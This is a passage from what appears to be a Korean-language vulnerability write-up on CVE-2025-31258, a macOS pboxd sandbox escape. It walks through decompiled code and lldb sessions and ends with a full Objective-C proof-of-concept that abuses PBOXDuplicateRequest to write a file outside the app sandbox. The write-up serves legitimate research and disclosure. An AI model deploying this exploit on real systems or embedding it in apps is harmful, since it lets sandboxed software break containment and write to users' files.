\"stringByPBOXRealPath\"));\n  objc_release(v47);\n<\/pre>\n\n\n\n
          id __cdecl -[NSString stringByPBOXRealPath](NSString *self, SEL a2)\n{\n  NSString *v2; \/\/ x0\n  void *v3; \/\/ x0\n  id v6; \/\/ [xsp+18h] [xbp-28h] BYREF\n  void *v7; \/\/ [xsp+20h] [xbp-20h]\n  SEL v8; \/\/ [xsp+28h] [xbp-18h]\n  NSString *v9; \/\/ [xsp+30h] [xbp-10h]\n  id v10; \/\/ [xsp+38h] [xbp-8h]\n  __int64 vars8; \/\/ [xsp+48h] [xbp+8h]\n\n  v9 = self;\n  v8 = a2;\n  v2 = objc_retainAutorelease(self);\n  v7 = realpath_DARWIN_EXTSN(-[NSString fileSystemRepresentation](self, \"fileSystemRepresentation\"), 0);\n  if ( v7 )\n  {\n    v6 = objc_retainAutoreleasedReturnValue(+[NSString stringWithUTF8String:](&OBJC_CLASS___NSString, \"stringWithUTF8String:\", v7));\n    free(v7);\n    v10 = objc_retain(v6);\n    objc_storeStrong(&v6, 0);\n  }\n  else\n  {\n    v10 = 0;\n  }\n  v3 = v10;\n  if ( ((vars8 ^ (2 * vars8)) & 0x4000000000000000LL) != 0 )\n    __break(0xC471u);\n  return objc_autoreleaseReturnValue(v3);\n}\n<\/pre>\n\n\n\n
          \uc774\ud6c4\uc5d0\ub294 v60, v59 \ubcc0\uc218\uc5d0 \ub4e4\uc5b4\uac04 \ubb38\uc790\uc5f4\uc774 \uc11c\ub85c \uac19\uae30 \ub584\ubb38\uc5d0 LABEL_8\uc73c\ub85c \uc774\ub3d9\ud55c\ub2e4.<\/p>\n\n\n\n
            if ( ((unsigned int)objc_msgSend(v60, \"isEqualToString:\", v59) & 1) != 0 )\n    goto LABEL_8;\n  v43 = objc_retainAutoreleasedReturnValue(NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, 1u, 1));\n  v42 = objc_retainAutoreleasedReturnValue(-[NSArray lastObject](v43, \"lastObject\"));\n  v58 = objc_retainAutoreleasedReturnValue(objc_msgSend(v42, \"stringByPBOXRealPath\"));\n  objc_release(v42);\n  objc_release(v43);\n  if ( v58 )                                 \n  {\n    if ( ((unsigned int)objc_msgSend(v58, \"isEqualToString:\", v59) & 1) != 0 ) \n    {\n      v57 = 0;\n    }\n    else\n    {\n      v40 = objc_retainAutoreleasedReturnValue(\n              +[NSError errorWithDomain:code:userInfo:](\n                &OBJC_CLASS___NSError,\n                \"errorWithDomain:code:userInfo:\",\n                NSPOSIXErrorDomain,\n                1,\n                0));\n      v5 = objc_autorelease(v40);\n      *v62 = v40;\n      v66 = 0;\n      v57 = 1;\n    }\n  }\n  else\n  {\n    v41 = objc_retainAutoreleasedReturnValue(+[RVSLogger defaultLogger](&OBJC_CLASS___RVSLogger, \"defaultLogger\"));\n    objc_msgSend(v41, \"debug:\", CFSTR(\"NSSearchPathForDirectoriesInDomains returns no Documents directory\"));\n    objc_release(v41);\n    v66 = 0;\n    v57 = 1;\n  }\n  objc_storeStrong(&v58, 0);\n  if ( !v57 )\n  {\nLABEL_8:\n...\n  }\n  objc_storeStrong(&v59, 0);\n  objc_storeStrong(&v60, 0);\n  objc_storeStrong(&v61, 0);\n  objc_storeStrong(&v63, 0);\n  objc_storeStrong(location, 0);\n  v18 = v66;\n  if ( ((vars8 ^ (2 * vars8)) & 0x4000000000000000LL) != 0 )\n    __break(0xC471u);\n  return objc_autoreleaseReturnValue(v18);\n}\n<\/pre>\n\n\n\n
          \uac01 \ub9c8\uc9c0\ub9c9 \ucef4\ud3ec\ub108\ud2b8 \ud30c\uc77c \uc774\ub984\uc5d0\uc11c \ud655\uc7a5\uc790\uac00 \uc788\ub294\uc9c0 \ud30c\uc2f1\ud558\uace0,<\/p>\n\n\n\n
            if ( !v57 )                                   \/\/ v56 should be 0, to enter if statement\n  {\nLABEL_8:\n    v56 = objc_retainAutoreleasedReturnValue(objc_msgSend(location[0], \"lastPathComponent\"));\/\/ \/Users\/seo\/Documents -> Documents\n    v55 = objc_retainAutoreleasedReturnValue(objc_msgSend(v63, \"lastPathComponent\"));\/\/ \/Users\/seo\/Documents copy 1337 -> Documents copy 1337\n    v37 = objc_retainAutoreleasedReturnValue(objc_msgSend(v56, \"pathExtension\"));\/\/ Documents -> nil\n    v38 = objc_retainAutoreleasedReturnValue(objc_msgSend(v55, \"pathExtension\"));\/\/ Documents copy 1337 -> nil\n<\/pre>\n\n\n\n
          \ud655\uc7a5\uc790\uac00 \ub458\ub2e4 nil\uc774\uae30\uc5d0 \ucc38\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n
          \ub530\ub77c\uc11c if \ubb38\uc548\uc5d0 \uc788\ub294 \ucf54\ub4dc\uac00 \uc9c4\uc785\ud558\uc9c0 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n
          if ( ((unsigned __int8)objc_msgSend(v37, \"isEqualToString:\") & 1) == 0 )\/\/ nil == nil\n    {\n      v54 = objc_retainAutoreleasedReturnValue(objc_msgSend(v55, \"pathExtension\"));\n      v53 = 1;\n      v39 = sub_10001332C(v54) ^ 1;\n    }\n<\/pre>\n\n\n\n
          \uadf8\ub9ac\uace0 v53\uc740 \ucd08\uae30 \uc120\uc5b8\uc5d0\uc11c 0\uc744 \uc9c0\uc815\ud588\uae30\uc5d0 else \ubb38\uc73c\ub85c \uc9c4\uc785\ud558\uac8c \ub41c\ub2e4..<\/p>\n\n\n\n
          if ( (v53 & 1) != 0 )\n      objc_release(v54);\n    objc_release(v38);\n    objc_release(v37);\n    if ( (v39 & 1) != 0 )\n    {\n      v36 = objc_retainAutoreleasedReturnValue(\n              +[NSError errorWithDomain:code:userInfo:](\n                &OBJC_CLASS___NSError,\n                \"errorWithDomain:code:userInfo:\",\n                NSPOSIXErrorDomain,\n                1,\n                0));\n      v6 = objc_autorelease(v36);\n      *v62 = v36;\n      v66 = 0;\n      v57 = 1;\n    }\n    else \/\/else \ubb38 \uc9c4\uc785!!!!\n    {\n    ...\n<\/pre>\n\n\n\n
          else \ubb38 \ub4a4\uc5d0\ub294 +[NSDocument _validateDuplicateDocumentName:withOriginalName:] \uba54\uc18c\ub4dc\ub97c \ud1b5\ud574 \uc5b4\ub5a0\ud55c \uac80\uc99d\uc744 \ud558\uace0 \uc788\ub294\ub370, \uc6b0\uc120 \uac80\uc99d\ud558\ub294 \uba54\uc18c\ub4dc\uc758 \uac01\uac01 \ub9e4\uac1c\ubcc0\uc218\uc5d0\ub294 \ud655\uc7a5\uc790\ub97c \uc81c\uac70\ud55c \ud30c\uc77c \uc774\ub984\uc774 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
          else\n    {\n      v34 = objc_retainAutoreleasedReturnValue(objc_msgSend(v55, \"stringByDeletingPathExtension\"));\n      v33 = objc_retainAutoreleasedReturnValue(objc_msgSend(v56, \"stringByDeletingPathExtension\"));\n      v35 = (unsigned __int8)+[NSDocument _validateDuplicateDocumentName:withOriginalName:](\n                               &OBJC_CLASS___NSDocument,\n                               \"_validateDuplicateDocumentName:withOriginalName:\",\n                               v34); \n      objc_release(v33);\n      objc_release(v34);\n<\/pre>\n\n\n\n
          (lldb) c\nProcess 958 resuming\nProcess 958 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 17.1\n    frame #0: 0x0000000100743b3c com.apple.security.pboxd`___lldb_unnamed_symbol509 + 1024\ncom.apple.security.pboxd`___lldb_unnamed_symbol509:\n->  0x100743b3c <+1024>: bl     0x10074d0c0\n    0x100743b40 <+1028>: mov    x8, x0\n    0x100743b44 <+1032>: ldr    x0, [sp, #0xb0]\n    0x100743b48 <+1036>: str    w8, [sp, #0xc4]\nTarget 0: (com.apple.security.pboxd) stopped.\n(lldb) po $x0\nNSDocument\n\n(lldb) po $x1\n<nil>\n\n(lldb) po $x2\nDocuments copy 1337\n\n(lldb) po $x3\nDocuments\n<\/pre>\n\n\n\n
          +[NSDocument _validateDuplicateDocumentName:withOriginalName:] \ud574\ub2f9 \uba54\uc18c\ub4dc\ub294 AppKit \ub77c\uc774\ube0c\ub7ec\ub9ac\uc5d0 \ub4e4\uc5b4\uac00\uc788\ub2e4.<\/p>\n\n\n\n
          \uba54\uc18c\ub4dc \ubc18\ud658\uc774 \ucc38\uc774 \ub420\ub824\uba74 \uc870\uac74\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
            \n
          1. \u201c\ubcf5\uc81c\uba85(\uccab \ubc88\uc9f8 \uc778\uc790)\u201d\uc758 \uc22b\uc790 \ubd80\ubd84<\/strong>\uc774 \u201c\uc6d0\ubcf8\uba85(\ub450 \ubc88\uc9f8 \uc778\uc790)\u201d\uc758 \uc22b\uc790 \ubd80\ubd84<\/strong>\ubcf4\ub2e4 \ucee4\uc57c<\/strong> \ud55c\ub2e4.<\/li>\n\n\n\n
          2. \ub450 \uc774\ub984\uc758 \u201c\uae30\ubcf8 \uc774\ub984(base name)\u201d<\/strong>(\uc22b\uc790 \uc811\ubbf8\uc0ac\ub97c \uc81c\uc678\ud55c \uc55e\ubd80\ubd84)\uc774 \uc11c\ub85c \ub3d9\uc77c\ud574\uc57c<\/strong> \ud55c\ub2e4.<\/li>\n<\/ol>\n\n\n\n
            \ub530\ub77c\uc11c \ub450\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\uc5d0 Documents copy 1337 \ub4e4\uc5b4\uac04 \uc774\uc720 \uc911 \ud558\ub098\uc774\ub2e4.<\/p>\n\n\n\n
            bool __cdecl +[NSDocument _validateDuplicateDocumentName:withOriginalName:](id a1, SEL a2, id a3, id a4)\n{\n  id v6; \/\/ x19\n  id v7; \/\/ x20\n  id v8; \/\/ x21\n  id v9; \/\/ x22\n  unsigned __int8 v10; \/\/ w23\n  id v12; \/\/ [xsp+0h] [xbp-50h] BYREF\n  id v13; \/\/ [xsp+8h] [xbp-48h] BYREF\n  __int64 v14; \/\/ [xsp+10h] [xbp-40h] BYREF\n  __int64 v15; \/\/ [xsp+18h] [xbp-38h] BYREF\n\n  v6 = objc_retain(a3);\n  v7 = objc_retain(a4);\n  v14 = 0;\n  v15 = 0;\n  v13 = 0;\n  objc_msgSend(a1, \"_parseBaseName:number:fromDisplayName:\", &v13, &v15, v6);\n  v8 = objc_retain(v13);\n  v12 = 0;\n  objc_msgSend(a1, \"_parseBaseName:number:fromDisplayName:\", &v12, &v14, v7);\n  v9 = objc_retain(v12);\n  if ( v15 <= v14 )\n    v10 = 0;\n  else\n    v10 = (unsigned __int8)objc_msgSend(v8, \"isEqualToString:\", v9);\n  objc_release(v9);\n  objc_release(v8);\n  objc_release(v7);\n  objc_release(v6);\n  return v10;\n}\n<\/pre>\n\n\n\n
            void __cdecl +[NSDocument _parseBaseName:number:fromDisplayName:](id a1, SEL a2, id *a3, signed __int64 *a4, id a5)\n{\n  id v8; \/\/ x19\n  id v9; \/\/ x24\n  id v10; \/\/ x25\n  void *v11; \/\/ x23\n  void *v12; \/\/ x24\n  __int64 v13; \/\/ x25\n  void *v14; \/\/ x26\n  id v15; \/\/ x0\n  __int128 v16; \/\/ [xsp+0h] [xbp-130h] BYREF\n  __int128 v17; \/\/ [xsp+10h] [xbp-120h]\n  __int128 v18; \/\/ [xsp+20h] [xbp-110h]\n  __int128 v19; \/\/ [xsp+30h] [xbp-100h]\n  _QWORD v20[2]; \/\/ [xsp+48h] [xbp-E8h] BYREF\n  _BYTE v21[128]; \/\/ [xsp+58h] [xbp-D8h] BYREF\n  __int64 v22; \/\/ [xsp+D8h] [xbp-58h]\n\n  v22 = *MEMORY[0x1E8BC4698];\n  v8 = objc_retain(a5);\n  v16 = 0u;\n  v17 = 0u;\n  v18 = 0u;\n  v19 = 0u;\n  v9 = objc_retainAutoreleasedReturnValue((id)_NXKitString(CFSTR(\"Document\"), CFSTR(\"%@ copy\")));\n  v20[0] = v9;\n  v10 = objc_retainAutoreleasedReturnValue((id)_NXKitString(CFSTR(\"Document\"), CFSTR(\"%@ copy %@\")));\n  v20[1] = v10;\n  v11 = objc_retainAutoreleasedReturnValue(objc_msgSend(MEMORY[0x1E8B488C8], \"arrayWithObjects:count:\", v20, 2));\n  objc_release(v10);\n  objc_release(v9);\n  v12 = objc_msgSend(v11, \"countByEnumeratingWithState:objects:count:\", &v16, v21, 16);\n  if ( v12 )\n  {\n    v13 = *(_QWORD *)v17;\n    while ( 2 )\n    {\n      v14 = 0;\n      do\n      {\n        if ( *(_QWORD *)v17 != v13 )\n          objc_enumerationMutation(v11);\n        if ( ((unsigned int)objc_msgSend(\n                              a1,\n                              \"_parseName:number:fromDisplayName:withTemplate:\",\n                              a3,\n                              a4,\n                              v8,\n                              *(_QWORD *)(*((_QWORD *)&v16 + 1) + 8LL * (_QWORD)v14))\n            & 1) != 0 )\n        {\n          objc_release(v11);\n          goto LABEL_11;\n        }\n        v14 = (char *)v14 + 1;\n      }\n      while ( v12 != v14 );\n      v12 = objc_msgSend(v11, \"countByEnumeratingWithState:objects:count:\", &v16, v21, 16);\n      if ( v12 )\n        continue;\n      break;\n    }\n  }\n  objc_release(v11);\n  *a4 = 0;\n  v15 = objc_retainAutorelease(v8);\n  *a3 = v8;\nLABEL_11:\n  objc_release(v8);\n}\n<\/pre>\n\n\n\n
            \ubc29\uae08 \uc5b8\uae09\ud55c \uba54\uc18c\ub4dc\ub294 \uc774\uc81c \ucc38\uc774 \ub418\uc5b4 v35\uac12\uc740 1\ub85c \uc9c0\uc815\ub41c\ub2e4.<\/p>\n\n\n\n
            \uadf8\ub9ac\uace0 (unsigned int)sandbox_check_by_audit_token(v50, “file-write-data”, v31)\uc5d0\uc11c 1\uc744 \ubc18\ud658\ud558\ub294\ub370, \/Users\/seo\/Documents copy 1337 \ud30c\uc77c\uc744 \uc4f8 \uc218 \uc788\ub294\uc9c0 \ud655\uc778\ud55c\ub2e4. \uc0cc\ub4dc\ubc15\uc2a4\uc5d0 \uc758\ud574 \ub9c9\ud788\uae30 \ub54c\ubb38\uc5d0 1\uc744 \ubc18\ud658\ud55c\ub2e4.<\/p>\n\n\n\n
            \uadf8\ub7ec\uba74 goto LABEL_19;\uc73c\ub85c \uc774\ub3d9\ud558\uc9c0 \uc54a\uace0 \ud55c\ubc88 \ub354 \uac80\uc0ac\ud558\ub294\ub370,<\/p>\n\n\n\n
            (unsigned int)sandbox_check_by_audit_token(v49, “file-read-data”, v29) \ud638\ucd9c\uc744 \ud1b5\ud574 \/Users\/seo\/Documents \ub0b4\uc758 \ud30c\uc77c\uc744 \uc77d\uc744 \uc218 \uc788\ub294\uc9c0 \ud655\uc778\ud55c\ub2e4.<\/p>\n\n\n\n
            \uadf8\ub807\ub2e4\u2026<\/strong> \uc0ac\uc2e4\uc740 \/Users\/seo\/Documents \uc5d0 \uc77d\uae30 \uad8c\ud55c\uc744 \uc8fc\uc5b4\uc57c\ub9cc \uc0cc\ub4dc\ubc15\uc2a4 \ud0c8\ucd9c\uc774 \uac00\ub2a5\ud55c\uac83\uc774\ub2e4.<\/strong> \ub098\ub984 \uc81c\ud55c\uc801\uc774\ub77c\uace0 \ubcfc \uc218 \uc788\ub2e4.<\/strong><\/p>\n\n\n\n
            v35 = (unsigned __int8)+[NSDocument _validateDuplicateDocumentName:withOriginalName:](\n                               &OBJC_CLASS___NSDocument,\n                               \"_validateDuplicateDocumentName:withOriginalName:\",\n                               v34);\n      objc_release(v33);\n      objc_release(v34);\n      if ( (v35 & 1) != 0 )\n      {\n        v52 = objc_retainAutoreleasedReturnValue(objc_msgSend(v60, \"stringByAppendingPathComponent:\", v56));\n        v51 = objc_retainAutoreleasedReturnValue(objc_msgSend(v59, \"stringByAppendingPathComponent:\", v55));\n        p_pid = &v65->_pid;\n        v31 = SANDBOX_CHECK_NO_REPORT | 1 | SANDBOX_CHECK_CANONICAL;\n        v8 = objc_retainAutorelease(v52);\n        v9 = objc_msgSend(v52, \"UTF8String\");\n        v50[0] = *(_OWORD *)p_pid;\n        v50[1] = *((_OWORD *)p_pid + 1);\n        v20 = v9;\n        if ( !(unsigned int)sandbox_check_by_audit_token(v50, \"file-write-data\", v31) )\n          goto LABEL_19;\n        v28 = &v65->_pid;\n        v29 = SANDBOX_CHECK_NO_REPORT | 1 | SANDBOX_CHECK_CANONICAL;\n        v27 = v52;\n        v10 = objc_retainAutorelease(v52);\n        v11 = objc_msgSend(v27, \"UTF8String\", v20);\n        v49[0] = *(_OWORD *)v28;\n        v49[1] = *((_OWORD *)v28 + 1);\n        v20 = v11;\n        if ( (unsigned int)sandbox_check_by_audit_token(v49, \"file-read-data\", v29) )\n        {\n          v26 = objc_retainAutoreleasedReturnValue(\n                  +[NSError errorWithDomain:code:userInfo:](\n                    &OBJC_CLASS___NSError,\n                    \"errorWithDomain:code:userInfo:\",\n                    NSPOSIXErrorDomain,\n                    1,\n                    0,\n                    v20));\n          v12 = objc_autorelease(v26);\n          *v62 = v26;\n          v66 = 0;\n          v57 = 1;\n        }\n        else\n        {\nLABEL_19:\n          v24 = objc_retainAutoreleasedReturnValue(+[NSFileManager defaultManager](&OBJC_CLASS___NSFileManager, \"defaultManager\", v20));\n          v25 = -[NSFileManager fileExistsAtPath:](v24, \"fileExistsAtPath:\", v51);\n          objc_release(v24);\n          if ( (v25 & 1) != 0 )\n          {\n            v23 = objc_retainAutoreleasedReturnValue(\n                    +[NSError errorWithDomain:code:userInfo:](\n                      &OBJC_CLASS___NSError,\n                      \"errorWithDomain:code:userInfo:\",\n                      NSPOSIXErrorDomain,\n                      17,\n                      0));\n            v13 = objc_autorelease(v23);\n            *v62 = v23;\n            v66 = 0;\n            v57 = 1;\n          }\n          else\n          {\n            v22 = v51;\n            v14 = objc_retainAutorelease(v51);\n            objc_msgSend(v22, \"UTF8String\");\n            v48 = (void *)sandbox_extension_issue_file();\n            if ( v48 )\n            {\n              v16 = objc_retainAutoreleasedReturnValue(+[NSString stringWithUTF8String:](&OBJC_CLASS___NSString, \"stringWithUTF8String:\", v48));\n              v17 = v61;\n              v61 = v16;\n              objc_release(v17);\n              free(v48);\n              v66 = objc_retain(v61);\n            }\n            else\n            {\n              v21 = objc_retainAutoreleasedReturnValue(\n                      +[NSError errorWithDomain:code:userInfo:](\n                        &OBJC_CLASS___NSError,\n                        \"errorWithDomain:code:userInfo:\",\n                        NSPOSIXErrorDomain,\n                        *__error(),\n                        0));\n              v15 = objc_autorelease(v21);\n              *v62 = v21;\n              v66 = 0;\n            }\n            v57 = 1;\n          }\n        }\n        objc_storeStrong(&v51, 0);\n        objc_storeStrong(&v52, 0);\n      }\n<\/pre>\n\n\n\n
            \n\/\/ (unsigned int)sandbox_check_by_audit_token(v50, \"file-write-data\", v31) \uc5d0\uc11c \ube0c\ub808\uc774\ud06c\ub428\n(lldb) c\nProcess 958 resuming\nProcess 958 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 18.1\n    frame #0: 0x0000000100743c80 com.apple.security.pboxd`___lldb_unnamed_symbol509 + 1348\ncom.apple.security.pboxd`___lldb_unnamed_symbol509:\n->  0x100743c80 <+1348>: bl     0x10074c570    ; symbol stub for: sandbox_check_by_audit_token\n    0x100743c84 <+1352>: cbz    w0, 0x100743d6c ; <+1584>\n    0x100743c88 <+1356>: b      0x100743c8c    ; <+1360>\n    0x100743c8c <+1360>: ldur   x8, [x29, #-0x20]\nTarget 0: (com.apple.security.pboxd) stopped.\n(lldb) po $x0\n6164372752\n\n(lldb) po $x1\n4302654342\n\n(lldb) po $x2\n1610612737\n\n(lldb) po $x3\n47513354648\n\n(lldb) po $x4\n21\n\n(lldb) po $x5\n1\n\n(lldb) po $x6\n\/Users\/seo\/Documents copy 1337\n\n(lldb) reg read x0\n      x0 = 0x000000016f6cdd10\n(lldb) reg read x0 x1 x2 x3 x4 x5 x6\n      x0 = 0x000000016f6cdd10\n      x1 = 0x0000000100754b86  \"file-write-data\"\n      x2 = 0x0000000060000001\n      x3 = 0x0000000b10044198\n      x4 = 0x0000000000000015\n      x5 = 0x0000000000000001\n      x6 = 0x0000000b101a9270\n      \n\/\/ (unsigned int)sandbox_check_by_audit_token(v49, \"file-read-data\", v29) \uc5d0\uc11c \ube0c\ub808\uc774\ud06c\ub428\n(lldb) c\nProcess 958 resuming\nProcess 958 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 20.1\n    frame #0: 0x0000000100743d10 com.apple.security.pboxd`___lldb_unnamed_symbol509 + 1492\ncom.apple.security.pboxd`___lldb_unnamed_symbol509:\n->  0x100743d10 <+1492>: bl     0x10074c570    ; symbol stub for: sandbox_check_by_audit_token\n    0x100743d14 <+1496>: cbz    w0, 0x100743d6c ; <+1584>\n    0x100743d18 <+1500>: b      0x100743d1c    ; <+1504>\n    0x100743d1c <+1504>: ldur   x1, [x29, #-0xf0]\nTarget 0: (com.apple.security.pboxd) stopped.\n(lldb) po $x0\n6164372720\n\n(lldb) po $x6\n<2f557365 72732f73 656f2f44 6f63756d 656e7473 00>\n<\/pre>\n\n\n\n
            \ub9cc\uc57d \/Users\/seo\/Documents\uc5d0 \uc77d\uae30 \uad8c\ud55c\uc774 \uc8fc\uc5b4\uc9c4\ub2e4\uba74\u2026 (unsigned int)sandbox_check_by_audit_token(v49, “file-read-data”, v29)\uc5d0\uc11c 0\uc744 \ubc18\ud658\ud574\uc900\ub2e4.<\/p>\n\n\n\n
            \uadf8\ub7ec\uba74 else \ubb38\uc73c\ub85c \uc774\ub3d9\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
            -[NSFileManager fileExistsAtPath:] \uba54\uc18c\ub4dc\ub97c \ud1b5\ud574 \/Users\/seo\/Documents copy 1337 \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\ub294\uc9c0 \ud655\uc778\ud558\ub294\ub370, \uc874\uc7ac\ud558\uba74 \uc548\ub41c\ub2e4.<\/p>\n\n\n\n
            \uc774\ud6c4\ub85c\ub294 _APP_SANDBOX_READ_WRITE \ub9e4\uac1c\ubcc0\uc218\uc640 \ud568\uaf10 sandbox_extension_issue_file \ud638\ucd9c\ub418\uc5b4 \/Users\/seo\/Documents copy 1337 \ud30c\uc77c\uc744 \uc77d\uae30\/\uc4f0\uae30 \ud560 \uc218 \uc788\ub294 \uad8c\ud55c\uc744 \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
            \uc989 \/Users\/seo\/Documents\uc5d0 \uc77d\uae30 \uad8c\ud55c\ub9cc \uc8fc\uc5b4\uc84c\uc9c0\ub9cc, Documents \ud3f4\ub354\ub97c \ubc97\uc5b4\ub09c \/User\/seo\uc5d0 \uc0c8\ub85c\uc6b4 \ud30c\uc77c\uc778 Documents copy 1337 \ud30c\uc77c \ub610\ub294 \ud3f4\ub354\ub97c \uc0dd\uc131\uc2dc\ud0ac \uc218 \uc788\uac8c\ub41c \uc148\uc774\ub2e4.<\/p>\n\n\n\n
                   else\n        {\nLABEL_19:\n          v24 = objc_retainAutoreleasedReturnValue(+[NSFileManager defaultManager](&OBJC_CLASS___NSFileManager, \"defaultManager\", v20));\n          v25 = -[NSFileManager fileExistsAtPath:](v24, \"fileExistsAtPath:\", v51);\n          objc_release(v24);\n          if ( (v25 & 1) != 0 )\n          {\n            v23 = objc_retainAutoreleasedReturnValue(\n                    +[NSError errorWithDomain:code:userInfo:](\n                      &OBJC_CLASS___NSError,\n                      \"errorWithDomain:code:userInfo:\",\n                      NSPOSIXErrorDomain,\n                      17,\n                      0));\n            v13 = objc_autorelease(v23);\n            *v62 = v23;\n            v66 = 0;\n            v57 = 1;\n          }\n          else\n          {\n            v22 = v51;\n            v14 = objc_retainAutorelease(v51);\n            objc_msgSend(v22, \"UTF8String\");\n            v48 = (void *)sandbox_extension_issue_file();\n            if ( v48 )\n            {\n              v16 = objc_retainAutoreleasedReturnValue(+[NSString stringWithUTF8String:](&OBJC_CLASS___NSString, \"stringWithUTF8String:\", v48));\n              v17 = v61;\n              v61 = v16;\n              objc_release(v17);\n              free(v48);\n              v66 = objc_retain(v61);\n            }\n            else\n            {\n              v21 = objc_retainAutoreleasedReturnValue(\n                      +[NSError errorWithDomain:code:userInfo:](\n                        &OBJC_CLASS___NSError,\n                        \"errorWithDomain:code:userInfo:\",\n                        NSPOSIXErrorDomain,\n                        *__error(),\n                        0));\n              v15 = objc_autorelease(v21);\n              *v62 = v21;\n              v66 = 0;\n            }\n            v57 = 1;\n          }\n        }\n        objc_storeStrong(&v51, 0);\n        objc_storeStrong(&v52, 0);\n<\/pre>\n\n\n\n
            (lldb) c\nProcess 958 resuming\nProcess 958 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 22.1\n    frame #0: 0x0000000100743d90 com.apple.security.pboxd`___lldb_unnamed_symbol509 + 1620\ncom.apple.security.pboxd`___lldb_unnamed_symbol509:\n->  0x100743d90 <+1620>: bl     0x10074dc00\n    0x100743d94 <+1624>: mov    x8, x0\n    0x100743d98 <+1628>: ldr    x0, [sp, #0x58]\n    0x100743d9c <+1632>: str    w8, [sp, #0x64]\nTarget 0: (com.apple.security.pboxd) stopped.\n(lldb) po $x0\n<NSFileManager: 0x100bc2900>\n\n(lldb) po $x1\n<nil>\n\n(lldb) po $x2\n\/Users\/seo\/Documents copy 1337\n<\/pre>\n\n\n\n
            PoC code<\/h3>\n\n\n\n
            \/\/\n\/\/  ViewController.m\n\/\/  CVE-2025-31258\n\/\/\n\/\/  Created by seo on 5\/13\/25.\n\/\/\n\n#import \"ViewController.h\"\n#import <dlfcn.h>\n#import <sandbox.h>\n#import <xpc\/xpc.h>\n\n@interface NSDocument (Private)\n+ (BOOL)_validateDuplicateDocumentName:(NSString *)dupName\n                      withOriginalName:(NSString *)origName;\n@end\n\nint writeFileAtPath(const char *path, const char *content) {\n    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);\n    if (fd == -1) {\n        perror(\"open\");\n        return 1;\n    }\n\n    ssize_t bytes_written = write(fd, content, strlen(content));\n    if (bytes_written == -1) {\n        perror(\"write\");\n        close(fd);\n        return 1;\n    }\n\n    if (close(fd) == -1) {\n        perror(\"close\");\n        return 1;\n    }\n\n    return 0;\n}\n\nint64_t PBOXDuplicateRequest(NSURL *a1, NSURL *a2, NSError *a3) {\n    void *rvs = dlopen(\"\/System\/Library\/PrivateFrameworks\/\"\n                           \"RemoteViewServices.framework\/RemoteViewServices\",\n                           RTLD_NOW);\n    void *func_ptr = dlsym(rvs, \"PBOXDuplicateRequest\");\n\n    typedef int (*custom_func_t)(NSURL *, NSURL *, NSError *);\n    custom_func_t func = (custom_func_t)func_ptr;\n\n    return func(a1, a2, a3);\n}\n\nint poc(void) {\n    NSString *documentsPath = [NSString stringWithFormat:@\"\/Users\/%@\/Documents\", NSUserName()];\n    \/\/_validateDuplicateDocumentName:withOriginalName: arg2\n    NSURL *documentsURL = [NSURL fileURLWithPath:documentsPath];\n\n    NSString *copiedPath =\n    [NSString stringWithFormat:@\"\/Users\/%@\/Documents copy 1337\", NSUserName()]; \/\/_validateDuplicateDocumentName:withOriginalName: arg1\n    NSURL *copiedURL = [NSURL fileURLWithPath:copiedPath];\n    \n    NSError *_error = nil;\n\n    int64_t result = PBOXDuplicateRequest(documentsURL, copiedURL, _error);\n    NSLog(@\"PBOXDuplicateRequest _error: %@\\\\n\", _error);\n    printf(\"PBOXDuplicateRequest result: %lld\\\\n\", result);\n\n    return 0;\n}\n\nvoid grant_read_permission_to_documents(void) {\n    NSString *documentsPath = [NSString stringWithFormat:@\"\/Users\/%@\/Documents\", NSUserName()];\n    \n    NSOpenPanel *panel = [NSOpenPanel openPanel];\n    [panel setCanChooseDirectories:YES];\n    [panel setCanChooseFiles:NO];\n    [panel setAllowsMultipleSelection:NO];\n    [panel setPrompt:@\"Please select Document folder to grant read for POC.\"];\n    [panel setDirectoryURL:[NSURL fileURLWithPath:documentsPath]];\n    \n    \n    if ([panel runModal] == NSModalResponseOK) {\n        NSURL *selectedFolderURL = [panel URL];\n        NSLog(@\"Selected Folder: %@\", selectedFolderURL.path);\n        if(![documentsPath isEqualToString:selectedFolderURL.path]) {\n            NSLog(@\"It's not document folder, exiting....\");\n            exit(1);\n        }\n    }\n}\n\n@implementation ViewController\n- (IBAction)do_poc:(NSButton *)sender {\n    \n    \n    grant_read_permission_to_documents();\n    \n    poc();\n    \n    NSString *copiedPath = [NSString stringWithFormat:@\"\/Users\/%@\/Documents copy 1337\", NSUserName()];\n    writeFileAtPath(copiedPath.UTF8String, \"Escaped Sandbox!\");\n}\n\n- (void)viewDidLoad {\n    [super viewDidLoad];\n}\n\n- (void)setRepresentedObject:(id)representedObject {\n    [super setRepresentedObject:representedObject];\n    \n}\n\n@end\n<\/pre>\n\n\n\n
            Demo<\/h2>\n\n\n\n
            \n